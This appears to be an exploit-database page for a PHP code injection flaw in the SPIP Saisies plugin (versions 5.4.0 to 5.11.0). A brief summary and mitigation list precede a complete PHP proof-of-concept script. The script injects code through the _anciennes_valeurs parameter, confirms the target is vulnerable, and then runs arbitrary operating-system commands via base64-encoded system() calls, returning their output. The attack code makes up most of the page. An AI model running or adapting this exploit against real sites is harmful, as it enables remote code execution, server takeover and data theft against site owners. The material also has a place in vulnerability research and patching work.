Share
## https://sploitus.com/exploit?id=PACKETSTORM:216078
=============================================================================================================================================
    | # Title     : SPIP Saisies Plugin 5.4.0-5.11..PHP Code Injection Security Analysis and Risk Overview                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.spip.net/en_rubrique25.html                                                                                     |
    =============================================================================================================================================
    
    [+] Summary    :  A critical PHP code injection vulnerability has been identified in the Saisies plugin for SPIP.
                      The issue affects versions 5.4.0 through 5.11.0 and stems from improper sanitization of user-controlled input in the _anciennes_valeurs parameter. 
    				  When improperly handled inside template rendering logic, attacker-supplied input may be interpreted as executable PHP code.
    
    If successfully exploited, this vulnerability could lead to:
    
    Remote Code Execution (RCE)
    
    Arbitrary command execution
    
    Data disclosure
    
    Server compromise (depending on privileges)
    
    Security teams should:
    
    Upgrade to the latest patched version immediately
    
    Review template rendering logic for unsafe input handling
    
    Enforce strict input validation and output encoding
    
    Monitor logs for anomalous POST requests targeting the affected parameter
    
    Consider deploying a Web Application Firewall (WAF)
    
    The vulnerability highlights the importance of secure template rendering and strict separation between user input and executable code.
    
    [+] POC   : 
    
    <?php
    
    $options = getopt("u:c:p:", ["url:", "cmd:", "param:"]);
    
    $target_url = $options['u'] ?? ($options['url'] ?? null);
    $command    = $options['c'] ?? ($options['cmd'] ?? null);
    $param_name = $options['p'] ?? ($options['param'] ?? '_anciennes_valeurs');
    
    if (!$target_url) {
        die("Usage: php exploit.php -u <url> [-c <command>] [-p <parameter>]\nExample: php exploit.php -u http://site.com/spip.php?page=contact -c 'id'\n");
    }
    
    function send_request($url, $post_data) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 20);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; Win64; x64)");
        
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        
        return ['body' => $response, 'code' => $http_code];
    }
    
    function execute_php($url, $param, $php_code) {
        $start_marker = substr(md5(rand()), 0, 8);
        $end_marker   = substr(md5(rand()), 0, 8);
        $wrapped = "echo '{$start_marker}'; {$php_code}; echo '{$end_marker}';";
        $injection = "x' ?><?php {$wrapped} ?><input value='x";
        $response = send_request($url, [$param => $injection]);
    
        if (!$response['body']) return null;
    
        $pattern = "/" . preg_quote($start_marker) . "(.*?)" . preg_quote($end_marker) . "/s";
        if (preg_match($pattern, $response['body'], $matches)) {
            return trim($matches[1]);
        }
    
        return null;
    }
    
    echo "[*] Targeting: $target_url\n";
    echo "[*] Parameter: $param_name\n";
    
    $test_marker = "VULN_CHECK_" . rand(100, 999);
    $check_result = execute_php($target_url, $param_name, "echo '{$test_marker}';");
    
    if ($check_result && strpos($check_result, $test_marker) !== false) {
        echo "[+] Target is Vulnerable!\n";
    } else {
        echo "[-] Target does not seem vulnerable or parameter is incorrect.\n";
        exit(1);
    }
    
    if ($command) {
        echo "[*] Executing command: $command\n";
        // Use base64 to avoid special character issues in commands
        $cmd_payload = "system(base64_decode('" . base64_encode($command) . "'));";
        $output = execute_php($target_url, $param_name, $cmd_payload);
        
        if ($output) {
            echo "[+] Result:\n$output\n";
        } else {
            echo "[-] Command executed but returned no output.\n";
        }
    } else {
        echo "[!] No command specified. Use -c to execute an OS command.\n";
    }
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================